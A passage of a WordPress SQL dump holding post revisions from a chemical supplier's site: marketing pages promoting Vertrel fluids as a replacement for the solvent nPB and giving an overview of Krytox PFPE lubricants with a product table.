INSERT INTO `wp_posts` VALUES (2433, 2, '2016-10-08 15:14:08', '2016-10-08 15:14:08', 'Why Vertrel fluids are a suitable replacement for nPB?\r\n\r\nRecently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf\r\n\r\nThe report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons it is an excellent replacement for nPB:\r\n<ol>\r\n 	<li><strong>Exposure Limit:</strong> Vertrel fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\r\n 	<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\r\n 	<li><strong>Solvent Maintenance:</strong> Vertrel fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\r\n 	<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\r\n 	<li><strong>Global Acceptance:</strong> These specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\r\n</ol>\r\n<strong>Summary</strong>\r\n\r\nVertrel <a href="https://www.miller-stephenson.com/chemicals/solvents/vertrel/">specialty fluids</a> have similar solvency strength as nPB. It is non-flammable, safe, and requires no stabilizers, making it an ideal replacement for nPB.\r\n\r\n<img class="alignnone size-full wp-image-2002" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser-1.jpg" alt="vapor-degreaser" width="680" height="498" />', 'Why Vertrel specialty fluids are a suitable replacement for nPB', '', 'inherit', 'closed', 'closed', '', '1121-revision-v1', '', '', '2016-10-08 15:14:08', '2016-10-08 15:14:08', '', 1121, 'https://www.miller-stephenson.com/1121-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2434, 2, '2016-10-08 15:14:39', '2016-10-08 15:14:39', 'Why are Vertrel fluids a suitable replacement for nPB?\r\n\r\nRecently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf\r\n\r\nThe report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons it is an excellent replacement for nPB:\r\n<ol>\r\n 	<li><strong>Exposure Limit:</strong> Vertrel fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\r\n 	<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\r\n 	<li><strong>Solvent Maintenance:</strong> Vertrel fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\r\n 	<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\r\n 	<li><strong>Global Acceptance:</strong> These specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\r\n</ol>\r\n<strong>Summary</strong>\r\n\r\nVertrel <a href="https://www.miller-stephenson.com/chemicals/solvents/vertrel/">specialty fluids</a> have similar solvency strength as nPB. It is non-flammable, safe, and requires no stabilizers, making it an ideal replacement for nPB.\r\n\r\n<img class="alignnone size-full wp-image-2002" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser-1.jpg" alt="vapor-degreaser" width="680" height="498" />', 'Why Vertrel specialty fluids are a suitable replacement for nPB', '', 'inherit', 'closed', 'closed', '', '1121-revision-v1', '', '', '2016-10-08 15:14:39', '2016-10-08 15:14:39', '', 1121, 'https://www.miller-stephenson.com/1121-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2435, 0, '2016-10-08 20:53:34', '2016-10-08 20:53:34', '', '', '', 'publish', 'closed', 'closed', '', '2435', '', '', '2016-10-08 20:53:34', '2016-10-08 20:53:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/2435/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2436, 0, '2016-10-10 09:12:38', '2016-10-10 09:12:38', '', '', '', 'publish', 'closed', 'closed', '', '2436', '', '', '2016-10-10 09:12:38', '2016-10-10 09:12:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/2436/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2437, 2, '2016-10-10 12:15:40', '2016-10-10 12:15:40', 'Discovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">Krytox 143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">Krytox 240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">Krytox 250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">Krytox 283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">Krytox XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Krytox Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">Krytox XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">Krytox XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">Krytox XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">Krytox GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">Krytox GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-10-10 12:15:40', '2016-10-10 12:15:40', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2438, 2, '2016-10-10 12:16:17', '2016-10-10 12:16:17', 'Discovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 143</td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 240</td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 250</td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 283</td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A series oils/XP 2A series greases</td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox Vacuum Pump Fluids</td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- S, SX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- AC, ACX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- BD, BDX, BDZ</td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 246</td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 407</td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-10-10 12:16:17', '2016-10-10 12:16:17', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2439, 2, '2016-10-10 12:19:24', '2016-10-10 12:19:24', 'Discovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" 